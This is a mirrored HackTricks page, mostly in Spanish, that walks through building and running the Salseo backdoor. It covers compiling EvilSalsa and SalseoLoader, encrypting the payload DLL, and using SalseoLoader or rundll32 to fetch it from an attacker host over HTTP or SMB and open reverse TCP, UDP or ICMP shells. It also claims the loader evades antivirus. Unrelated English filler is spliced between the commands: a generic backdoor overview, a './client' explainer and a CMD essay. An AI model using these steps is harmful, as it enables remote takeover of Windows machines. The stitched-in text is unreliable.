Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2025-02-17 06:28:27 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/backdoors/salseo.md

13 KiB
Raw Blame History

Salseo

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

Compilando los binarios

Descarga el código fuente de GitHub y compila EvilSalsa y SalseoLoader. Necesitarás tener Visual Studio instalado para compilar el código.

Compila ambos proyectos para la arquitectura de la máquina Windows donde los vayas a utilizar (si Windows admite x64, compílalos para esa arquitectura).

Puedes seleccionar la arquitectura dentro de Visual Studio en la pestaña "Build" en "Platform Target".

(**Si no encuentras estas opciones, presiona en "Project Tab" y luego en "<Project Name> Properties")

Luego, compila ambos proyectos (Build -> Build Solution) (Dentro de los registros aparecerá la ruta del ejecutable):

Preparando la puerta trasera

En primer lugar, necesitarás codificar el EvilSalsa.dll. Para hacerlo, puedes usar el script de Python encrypterassembly.py o puedes compilar el proyecto EncrypterAssembly:

Python

python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt

Windows

Salseo Backdoor

The Salseo backdoor is a type of malware that allows unauthorized access to a Windows system. It is designed to remain hidden and provide a remote attacker with control over the infected machine. The Salseo backdoor can be used to steal sensitive information, execute commands, and perform various malicious activities.

Installation

The Salseo backdoor can be installed on a target system through various methods, including:

  • Email attachments: The malware can be disguised as a legitimate file attached to an email. When the user opens the attachment, the backdoor is installed silently in the background.

  • Drive-by downloads: The backdoor can be downloaded and installed automatically when the user visits a compromised website.

  • Exploiting vulnerabilities: The malware can exploit security vulnerabilities in the target system to gain unauthorized access and install the backdoor.

Functionality

Once installed, the Salseo backdoor provides the attacker with a wide range of capabilities, including:

  • Remote access: The attacker can remotely control the infected system, allowing them to perform actions as if they were physically present.

  • Data theft: The backdoor can be used to steal sensitive information, such as login credentials, personal data, and financial information.

  • Command execution: The attacker can execute commands on the infected system, allowing them to perform various malicious activities.

  • Persistence: The backdoor can establish persistence on the infected system, ensuring that it remains active even after a reboot.

Detection and Removal

Detecting the Salseo backdoor can be challenging, as it is designed to remain hidden. However, there are several indicators that can help identify its presence, such as:

  • Unusual network traffic: The backdoor may communicate with a remote server, resulting in unusual network activity.

  • Suspicious processes: The backdoor may create new processes or modify existing ones, which can be detected through process monitoring tools.

  • Unauthorized access: If unauthorized access is detected on a system, it may indicate the presence of a backdoor.

To remove the Salseo backdoor, it is recommended to use an up-to-date antivirus or antimalware solution. Additionally, it is important to patch any vulnerabilities in the system to prevent future infections.

EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt

Ok, ahora tienes todo lo que necesitas para ejecutar todo el asunto de Salseo: el EvilDalsa.dll codificado y el binario de SalseoLoader.

Sube el binario SalseoLoader.exe a la máquina. No deberían ser detectados por ningún antivirus...

Ejecutar la puerta trasera

Obtener una shell inversa TCP (descargando el dll codificado a través de HTTP)

Recuerda iniciar un nc como el oyente de la shell inversa y un servidor HTTP para servir el evilsalsa codificado.

SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>

Obteniendo una shell inversa UDP (descargando un dll codificado a través de SMB)

Recuerda iniciar un nc como el oyente de la shell inversa, y un servidor SMB para servir el evilsalsa codificado (impacket-smbserver).

SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>

Obteniendo una shell inversa ICMP (dll codificada ya presente en la víctima)

Esta vez necesitarás una herramienta especial en el cliente para recibir la shell inversa. Descarga: https://github.com/inquisb/icmpsh

Desactivar respuestas ICMP:

sysctl -w net.ipv4.icmp_echo_ignore_all=1

#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0

Ejecutar el cliente:

To execute the client, follow these steps:

  1. Open a terminal window.

  2. Navigate to the directory where the client is located.

  3. Run the client executable by typing the following command:

    ./client

    This will start the client and establish a connection with the server.

  4. If prompted, enter the necessary credentials or configuration settings.

Once the client is successfully executed, it will be ready to communicate with the server and perform the desired actions.

python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"

Dentro de la víctima, vamos a ejecutar el salseo:

SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>

Compilando SalseoLoader como DLL exportando la función principal

Abre el proyecto SalseoLoader usando Visual Studio.

Agrega antes de la función principal: [DllExport]

Instala DllExport para este proyecto

Herramientas --> Gestor de paquetes NuGet --> Administrar paquetes NuGet para la solución...

Busca el paquete DllExport (usando la pestaña Examinar) y presiona Instalar (y acepta el mensaje emergente)

En la carpeta de tu proyecto han aparecido los archivos: DllExport.bat y DllExport_Configure.bat

Desinstala DllExport

Presiona Desinstalar (sí, es extraño pero confía en mí, es necesario)

Cierra Visual Studio y ejecuta DllExport_configure

Simplemente cierra Visual Studio

Luego, ve a tu carpeta SalseoLoader y ejecuta DllExport_Configure.bat

Selecciona x64 (si lo vas a usar en una máquina x64, ese fue mi caso), selecciona System.Runtime.InteropServices (dentro de Namespace para DllExport) y presiona Aplicar

Abre el proyecto nuevamente con Visual Studio

[DllExport] ya no debería estar marcado como error

Compila la solución

Selecciona Tipo de salida = Biblioteca de clases (Proyecto --> Propiedades de SalseoLoader --> Aplicación --> Tipo de salida = Biblioteca de clases)

Selecciona la plataforma x64 (Proyecto --> Propiedades de SalseoLoader --> Compilar --> Destino de la plataforma = x64)

Para compilar la solución: Compilar --> Compilar solución (Dentro de la consola de salida aparecerá la ruta de la nueva DLL)

Prueba la DLL generada

Copia y pega la DLL donde quieras probarla.

Ejecuta:

rundll32.exe SalseoLoader.dll,main

Si no aparece ningún error, ¡probablemente tienes una DLL funcional!

Obtén una shell usando la DLL

No olvides usar un servidor HTTP y configurar un escucha nc

Powershell

$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main

CMD

CMD (Command Prompt) is a command-line interpreter in Windows operating systems. It provides a text-based interface for executing commands and managing the system. CMD can be used to perform various tasks, such as navigating through directories, running programs, and managing files and processes.

CMD is a powerful tool for hackers as it allows them to execute commands and scripts on a target system. By gaining access to CMD, hackers can perform a wide range of activities, including reconnaissance, privilege escalation, and data exfiltration.

To exploit CMD, hackers often use backdoors to maintain persistent access to a compromised system. A backdoor is a hidden entry point that allows unauthorized access to a system. By installing a backdoor on a target system, hackers can bypass security measures and gain remote access at any time.

There are several methods to create a backdoor in CMD. One common technique is to modify system files or registry entries to enable remote access. Another approach is to use existing tools, such as Netcat or Meterpreter, to establish a reverse shell connection.

Once a backdoor is established, hackers can use CMD to execute commands and control the compromised system. They can also use CMD to upload and download files, manipulate system settings, and launch further attacks.

To protect against CMD-based attacks, it is important to regularly update and patch the operating system. Additionally, implementing strong access controls, monitoring system logs, and using intrusion detection systems can help detect and mitigate unauthorized access attempts.

CMD is a versatile tool that can be used for both legitimate system administration tasks and malicious activities. Understanding its capabilities and vulnerabilities is crucial for both defenders and attackers in the cybersecurity landscape.

set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥